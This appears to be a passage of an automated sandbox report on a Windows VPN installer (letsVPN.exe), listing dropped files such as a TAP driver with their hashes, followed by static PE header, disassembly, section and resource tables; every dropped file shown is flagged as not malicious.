                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39920
                                                                                                                                                                                                  Entropy (8bit):6.338128217115975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
                                                                                                                                                                                                  MD5:C10CCDEC5D7AF458E726A51BB3CDC732
                                                                                                                                                                                                  SHA1:0553AAB8C2106ABB4120353360D747B0A2B4C94F
                                                                                                                                                                                                  SHA-256:589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
                                                                                                                                                                                                  SHA-512:7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~..[...[...[....w..Z....w..^...[...m....w.._....w..^.../t..Q.../t..Z.../t..Z...Rich[...........................PE..d......_.........."......Z.....................@....................................=w....`A....................................................<.......X....p..T....x...#...........R..8............................S...............P...............................text..._>.......@.................. ..h.rdata.......P.......D..............@..H.data........`.......P..............@....pdata..T....p.......R..............@..HPAGE.................V.............. ..`INIT.................d.............. ..b.rsrc...X............p..............@..B.reloc...............v..............@..B................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\System32\catroot2\dberr.txt

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                  Size (bytes):3474
                                                                                                                                                                                                  Entropy (8bit):5.367100074109882
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:QO00eO00erMwUgWUg0B1kE3ZhpJp8ZpkRepk3YpgpN3O:QO00eO00erMwmkB1kAs
                                                                                                                                                                                                  MD5:43443B66132BCFD9F716077CDD301784
                                                                                                                                                                                                  SHA1:01D4D1025A9B49FCA9704B9461AFED8B64A3D9D2
                                                                                                                                                                                                  SHA-256:85F6B0E1882D6732913507956EA5F9C86D1F0ADABADC2443A02391AE0BABC80D
                                                                                                                                                                                                  SHA-512:A8B4C6B56223F7E4C01E86DA59F0C80FC152EEF7B1B9B1260D8A0DCB604D1CBBBB12D36E57ACEC0E92561F7CC3FAFA7422D2C8E37C1EC6607F1BB46D02588AA5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6041 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6699 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #4398 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6041 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6699 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #4398 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #2083 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #2459 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: SyncAllDBs Corruption or Schema Change..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #891 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #1307 encountered JET error -1601..CatalogDB: 08:57:12 03/10/2023: SyncDB:: Sync sta

                                                                                                                                                                                                  C:\Windows\System32\drivers\SETC543.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39920
                                                                                                                                                                                                  Entropy (8bit):6.338128217115975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
                                                                                                                                                                                                  MD5:C10CCDEC5D7AF458E726A51BB3CDC732
                                                                                                                                                                                                  SHA1:0553AAB8C2106ABB4120353360D747B0A2B4C94F
                                                                                                                                                                                                  SHA-256:589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
                                                                                                                                                                                                  SHA-512:7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~..[...[...[....w..Z....w..^...[...m....w.._....w..^.../t..Q.../t..Z.../t..Z...Rich[...........................PE..d......_.........."......Z.....................@....................................=w....`A....................................................<.......X....p..T....x...#...........R..8............................S...............P...............................text..._>.......@.................. ..h.rdata.......P.......D..............@..H.data........`.......P..............@....pdata..T....p.......R..............@..HPAGE.................V.............. ..`INIT.................d.............. ..b.rsrc...X............p..............@..B.reloc...............v..............@..B................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\System32\drivers\tap0901.sys (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39920
                                                                                                                                                                                                  Entropy (8bit):6.338128217115975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
                                                                                                                                                                                                  MD5:C10CCDEC5D7AF458E726A51BB3CDC732
                                                                                                                                                                                                  SHA1:0553AAB8C2106ABB4120353360D747B0A2B4C94F
                                                                                                                                                                                                  SHA-256:589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
                                                                                                                                                                                                  SHA-512:7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~..[...[...[....w..Z....w..^...[...m....w.._....w..^.../t..Q.../t..Z.../t..Z...Rich[...........................PE..d......_.........."......Z.....................@....................................=w....`A....................................................<.......X....p..T....x...#...........R..8............................S...............P...............................text..._>.......@.................. ..h.rdata.......P.......D..............@..H.data........`.......P..............@....pdata..T....p.......R..............@..HPAGE.................V.............. ..`INIT.................d.............. ..b.rsrc...X............p..............@..B.reloc...............v..............@..B................................................................................................................................................................................

                                                                                                                                                                                                  \Device\ConDrv

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:y:y
                                                                                                                                                                                                  MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                  SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                  SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                  SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:..

                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                  General

                                                                                                                                                                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Entropy (8bit):7.951733059880656
                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                  • Win64 Executable GUI (202006/5) 77.37%
                                                                                                                                                                                                  • InstallShield setup (43055/19) 16.49%
                                                                                                                                                                                                  • Win64 Executable (generic) (12005/4) 4.60%
                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.77%
                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.77%
                                                                                                                                                                                                  File name:letsVPN.exe
                                                                                                                                                                                                  File size:33'128'448 bytes
                                                                                                                                                                                                  MD5:ef0f5b020ea3238a98642cd7b56d84bb
                                                                                                                                                                                                  SHA1:9bfb209e7d43739cc9dea530680b0c4ecdbf5981
                                                                                                                                                                                                  SHA256:abf9a5632221e9fe423c9eeeb4c205497bf5bb1ff4aad8561609d81eaa82976e
                                                                                                                                                                                                  SHA512:cae5d82e433a68f3e1770ed21cd80479f4fa49fea367e0a6b28a8a5743dbc8feb658bc4c1171c514ce957a34a26c49541403745293b51d13a3c4bcaeca79d3e7
                                                                                                                                                                                                  SSDEEP:393216:eKb0lwDQigr/AwoVsxGxbiDDzWzmJ/2inHWazagVdtBrx8wXpZVYcs7:twuEiyoWG0DDzWCgin/tB97YF
                                                                                                                                                                                                  TLSH:74771202E78192F9D86DC035869B2B32F7A0B44A4735AAEB6BD153E50B75FC01E3871D
                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U7..4YJ.4YJ.4YJ:{.J.4YJ..4J.4YJ.."J.4YJ.4XJ.6YJ.L.J.4YJ.L.J.4YJ.L.JG4YJ.L.J.4YJ.f.J.4YJ.L.J.4YJRich.4YJ.......................

                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                  Icon Hash:804ceccc64ece837

                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Entrypoint:0x140062e64
                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                  Time Stamp:0x6770F00A [Sun Dec 29 06:45:30 2024 UTC]
                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                                  OS Version Minor:2
                                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                                  File Version Minor:2
                                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                                  Subsystem Version Minor:2
                                                                                                                                                                                                  Import Hash:edafe69053cd166dc7264345550f7ddd

                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  sub esp, 28h
                                                                                                                                                                                                  call 00007F5160B73174h
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  add esp, 28h
                                                                                                                                                                                                  jmp 00007F5160B6A157h
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  nop word ptr [eax+eax+00000000h]
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  mov eax, ecx
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  cmp eax, 08h
                                                                                                                                                                                                  jc 00007F5160B6A395h
                                                                                                                                                                                                  movzx edx, dl
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  mov ecx, 01010101h
                                                                                                                                                                                                  add dword ptr [ecx], eax
                                                                                                                                                                                                  add dword ptr [ecx], eax
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  imul edx, ecx
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  cmp eax, 40h
                                                                                                                                                                                                  jc 00007F5160B6A360h
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  neg ecx
                                                                                                                                                                                                  and ecx, 07h
                                                                                                                                                                                                  je 00007F5160B6A348h
                                                                                                                                                                                                  dec esp
                                                                                                                                                                                                  sub eax, ecx
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  mov dword ptr [eax], edx
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  add ecx, eax
                                                                                                                                                                                                  dec ebp
                                                                                                                                                                                                  mov ecx, eax
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  and eax, 3Fh
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  shr ecx, 06h
                                                                                                                                                                                                  jne 00007F5160B6A37Bh
                                                                                                                                                                                                  dec ebp
                                                                                                                                                                                                  mov ecx, eax
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  and eax, 07h
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  shr ecx, 03h
                                                                                                                                                                                                  je 00007F5160B6A353h
                                                                                                                                                                                                  nop
                                                                                                                                                                                                  nop
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  mov dword ptr [ecx], edx
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  add ecx, 08h
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  jne 00007F5160B6A336h
                                                                                                                                                                                                  dec ebp
                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                  je 00007F5160B6A34Ch
                                                                                                                                                                                                  mov byte ptr [ecx], dl
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  inc ecx
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  jne 00007F5160B6A338h
                                                                                                                                                                                                  ret
                                                                                                                                                                                                  nop dword ptr [eax+00h]
                                                                                                                                                                                                  nop
                                                                                                                                                                                                  nop
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  cmp ecx, 00001C00h
                                                                                                                                                                                                  jnc 00007F5160B6A372h
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  mov dword ptr [ecx], edx
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  mov dword ptr [ecx+08h], edx
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  mov dword ptr [ecx+10h], edx
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  add ecx, 40h
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  mov dword ptr [ecx-28h], edx
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  mov dword ptr [ecx-20h], edx
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  dec eax

                                                                                                                                                                                                  Rich Headers

                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                  • [ C ] VS2005 build 50727
                                                                                                                                                                                                  • [IMP] VS2005 build 50727
                                                                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                  • [ASM] VS2008 SP1 build 30729
                                                                                                                                                                                                  • [C++] VS2008 SP1 build 30729
                                                                                                                                                                                                  • [RES] VS2008 build 21022
                                                                                                                                                                                                  • [LNK] VS2008 SP1 build 30729

                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xad8b00x104.rdata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1f8e0000x12d30.rsrc
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1f840000x96d8.pdata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x810000xf40.rdata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                  Sections

                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                  .text0x10000x7f7c00x7f800a7d57b7d9e7b1994ec5470ae7229cd2dFalse0.4946997549019608zlib compressed data6.311975084207791IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .rdata0x810000x2f9480x2fa00f46b3ca44f6c1aea7e59564f52494ddcFalse0.2865506069553806data4.618225905174831IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .data0xb10000x1ed29700x1ecc400f39d5bd6306e5ec255a4cc1d60976d0cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                  .pdata0x1f840000x96d80x9800750c5041957e88c08b0d0d51b62ce8b5False0.4538445723684211data5.746289077799479IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .rsrc0x1f8e0000x12d300x12e00bdb6276c500950cd7f39c21191b247d0False0.3001215852649007data4.701905284524863IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                  Resources

                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                  RT_CURSOR0x1f8f6180x134dataEnglishUnited States0.39935064935064934
                                                                                                                                                                                                  RT_CURSOR0x1f8f74c0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4805194805194805
                                                                                                                                                                                                  RT_CURSOR0x1f8f8800xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"EnglishUnited States0.7
                                                                                                                                                                                                  RT_CURSOR0x1f8f9340x134AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.36363636363636365
                                                                                                                                                                                                  RT_CURSOR0x1f8fa680x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.35714285714285715
                                                                                                                                                                                                  RT_CURSOR0x1f8fb9c0x134dataEnglishUnited States0.37337662337662336
                                                                                                                                                                                                  RT_CURSOR0x1f8fcd00x134dataEnglishUnited States0.37662337662337664
                                                                                                                                                                                                  RT_CURSOR0x1f8fe040x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                                                                                                                                                                                                  RT_CURSOR0x1f8ff380x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.37662337662337664
                                                                                                                                                                                                  RT_CURSOR0x1f9006c0x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                                                                                                                                                                                                  RT_CURSOR0x1f901a00x134Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                                                                  RT_CURSOR0x1f902d40x134dataEnglishUnited States0.44155844155844154
                                                                                                                                                                                                  RT_CURSOR0x1f904080x134dataEnglishUnited States0.4155844155844156
                                                                                                                                                                                                  RT_CURSOR0x1f9053c0x134AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.5422077922077922
                                                                                                                                                                                                  RT_CURSOR0x1f906700x134dataEnglishUnited States0.2662337662337662
                                                                                                                                                                                                  RT_CURSOR0x1f907a40x134dataEnglishUnited States0.2824675324675325
                                                                                                                                                                                                  RT_CURSOR0x1f908d80x134dataEnglishUnited States0.3246753246753247
                                                                                                                                                                                                  RT_CURSOR0x1f90a0c0x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4025974025974026
                                                                                                                                                                                                  RT_CURSOR0x1f90b400xb4dataEnglishUnited States0.55
                                                                                                                                                                                                  RT_BITMAP0x1f90bf40x1a48Device independent bitmap graphic, 550 x 24 x 4, image size 6624EnglishUnited States0.20228894173602854
                                                                                                                                                                                                  RT_BITMAP0x1f9263c0x1c68Device independent bitmap graphic, 448 x 32 x 4, image size 7168EnglishUnited States0.3363586358635864
                                                                                                                                                                                                  RT_BITMAP0x1f942a40x2468Device independent bitmap graphic, 576 x 32 x 4, image size 9216EnglishUnited States0.3572961373390558
                                                                                                                                                                                                  RT_BITMAP0x1f9670c0x768Device independent bitmap graphic, 224 x 16 x 4, image size 1792EnglishUnited States0.15664556962025317
                                                                                                                                                                                                  RT_BITMAP0x1f96e740xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80EnglishUnited States0.44565217391304346
                                                                                                                                                                                                  RT_BITMAP0x1f96f2c0x144Device independent bitmap graphic, 33 x 11 x 4, image size 220EnglishUnited States0.37962962962962965
                                                                                                                                                                                                  RT_ICON0x1f970700x1ca8Device independent bitmap graphic, 48 x 96 x 24, image size 7296EnglishUnited States0.770174482006543
                                                                                                                                                                                                  RT_ICON0x1f98d180x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.37768817204301075
                                                                                                                                                                                                  RT_ICON0x1f990000x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5574324324324325
                                                                                                                                                                                                  RT_MENU0x1f991280x12edataEnglishUnited States0.5827814569536424
                                                                                                                                                                                                  RT_MENU0x1f992580xd48dataEnglishUnited States0.3552941176470588
                                                                                                                                                                                                  RT_MENU0x1f99fa00x64Matlab v4 mat-file (little endian) o, numeric, rows 7340176, columns 7340143EnglishUnited States0.84
                                                                                                                                                                                                  RT_DIALOG0x1f9a0040x33cdataEnglishUnited States0.5169082125603864
                                                                                                                                                                                                  RT_DIALOG0x1f9a3400x3badataEnglishUnited States0.46540880503144655
                                                                                                                                                                                                  RT_DIALOG0x1f9a6fc0x1d6dataEnglishUnited States0.5574468085106383
                                                                                                                                                                                                  RT_DIALOG0x1f9a8d40x1cadataEnglishUnited States0.5589519650655022
                                                                                                                                                                                                  RT_DIALOG0x1f9aaa00x222dataEnglishUnited States0.5183150183150184
                                                                                                                                                                                                  RT_DIALOG0x1f9acc40x538dataEnglishUnited States0.3787425149700599
                                                                                                                                                                                                  RT_DIALOG0x1f9b1fc0x540dataEnglishUnited States0.3757440476190476
                                                                                                                                                                                                  RT_DIALOG0x1f9b73c0x554dataEnglishUnited States0.3951612903225806
                                                                                                                                                                                                  RT_DIALOG0x1f9bc900x550dataEnglishUnited States0.3963235294117647
                                                                                                                                                                                                  RT_DIALOG0x1f9c1e00x366dataEnglishUnited States0.46436781609195404
                                                                                                                                                                                                  RT_DIALOG0x1f9c5480x1c6dataEnglishUnited States0.5969162995594713
                                                                                                                                                                                                  RT_DIALOG0x1f9c7100x2a0dataEnglishUnited States0.4955357142857143
                                                                                                                                                                                                  RT_DIALOG0x1f9c9b00xe8dataEnglishUnited States0.6336206896551724
                                                                                                                                                                                                  RT_DIALOG0x1f9ca980x1a2dataEnglishUnited States0.4688995215311005
                                                                                                                                                                                                  RT_DIALOG0x1f9cc3c0x15adataEnglishUnited States0.5057803468208093
                                                                                                                                                                                                  RT_DIALOG0x1f9cd980x34dataEnglishUnited States0.9038461538461539
                                                                                                                                                                                                  RT_STRING0x1f9cdcc0xccdataEnglishUnited States0.39215686274509803
                                                                                                                                                                                                  RT_STRING0x1f9ce980x4edataEnglishUnited States0.6410256410256411
                                                                                                                                                                                                  RT_STRING0x1f9cee80xd6dataEnglishUnited States0.5233644859813084
                                                                                                                                                                                                  RT_STRING0x1f9cfc00xd0dataEnglishUnited States0.6346153846153846
                                                                                                                                                                                                  RT_STRING0x1f9d0900x4bedataEnglishUnited States0.30065897858319607
                                                                                                                                                                                                  RT_STRING0x1f9d5500x44adataEnglishUnited States0.27140255009107467
                                                                                                                                                                                                  RT_STRING0x1f9d99c0x150Matlab v4 mat-file (little endian) i, numeric, rows 0, columns 0EnglishUnited States0.4851190476190476
                                                                                                                                                                                                  RT_STRING0x1f9daec0xa0dataEnglishUnited States0.55
                                                                                                                                                                                                  RT_STRING0x1f9db8c0x150dataEnglishUnited States0.2976190476190476
                                                                                                                                                                                                  RT_STRING0x1f9dcdc0x62dataEnglishUnited States0.3469387755102041
                                                                                                                                                                                                  RT_STRING0x1f9dd400x3adataEnglishUnited States0.6551724137931034
                                                                                                                                                                                                  RT_STRING0x1f9dd7c0x2aedataEnglishUnited States0.3556851311953353
                                                                                                                                                                                                  RT_STRING0x1f9e02c0x260dataEnglishUnited States0.0805921052631579
                                                                                                                                                                                                  RT_STRING0x1f9e28c0x330dataEnglishUnited States0.3492647058823529
                                                                                                                                                                                                  RT_STRING0x1f9e5bc0x27cdataEnglishUnited States0.33176100628930816
                                                                                                                                                                                                  RT_STRING0x1f9e8380x106dataEnglishUnited States0.5763358778625954
                                                                                                                                                                                                  RT_STRING0x1f9e9400xdadataEnglishUnited States0.43119266055045874
                                                                                                                                                                                                  RT_STRING0x1f9ea1c0x46dataEnglishUnited States0.7428571428571429
                                                                                                                                                                                                  RT_STRING0x1f9ea640xc6dataEnglishUnited States0.41919191919191917
                                                                                                                                                                                                  RT_STRING0x1f9eb2c0x1f8dataEnglishUnited States0.36706349206349204
                                                                                                                                                                                                  RT_STRING0x1f9ed240xaedataEnglishUnited States0.5689655172413793
                                                                                                                                                                                                  RT_STRING0x1f9edd40xd0StarOffice Gallery theme p, 1929408256 objects, 1st pEnglishUnited States0.6394230769230769
                                                                                                                                                                                                  RT_STRING0x1f9eea40x2adataEnglishUnited States0.5476190476190477
                                                                                                                                                                                                  RT_STRING0x1f9eed00x184dataEnglishUnited States0.48711340206185566
                                                                                                                                                                                                  RT_STRING0x1f9f0540x124dataEnglishUnited States0.4897260273972603
                                                                                                                                                                                                  RT_STRING0x1f9f1780x4e6dataEnglishUnited States0.37719298245614036
                                                                                                                                                                                                  RT_STRING0x1f9f6600x264dataEnglishUnited States0.3333333333333333
                                                                                                                                                                                                  RT_STRING0x1f9f8c40x2dadataEnglishUnited States0.3698630136986301
                                                                                                                                                                                                  RT_STRING0x1f9fba00x8adataEnglishUnited States0.6594202898550725
                                                                                                                                                                                                  RT_STRING0x1f9fc2c0xacdataEnglishUnited States0.45348837209302323
                                                                                                                                                                                                  RT_STRING0x1f9fcd80xdedataEnglishUnited States0.536036036036036
                                                                                                                                                                                                  RT_STRING0x1f9fdb80x4a8dataEnglishUnited States0.3221476510067114
                                                                                                                                                                                                  RT_STRING0x1fa02600x228dataEnglishUnited States0.4003623188405797
                                                                                                                                                                                                  RT_STRING0x1fa04880x2cdataEnglishUnited States0.5227272727272727
                                                                                                                                                                                                  RT_STRING0x1fa04b40x42dataEnglishUnited States0.6060606060606061
                                                                                                                                                                                                  RT_ACCELERATOR0x1fa04f80x88dataEnglishUnited States0.6911764705882353
                                                                                                                                                                                                  RT_ACCELERATOR0x1fa05800x230dataEnglishUnited States0.5285714285714286
                                                                                                                                                                                                  RT_ACCELERATOR0x1fa07b00x18dataEnglishUnited States1.2083333333333333
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa07c80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa07dc0x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08000x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
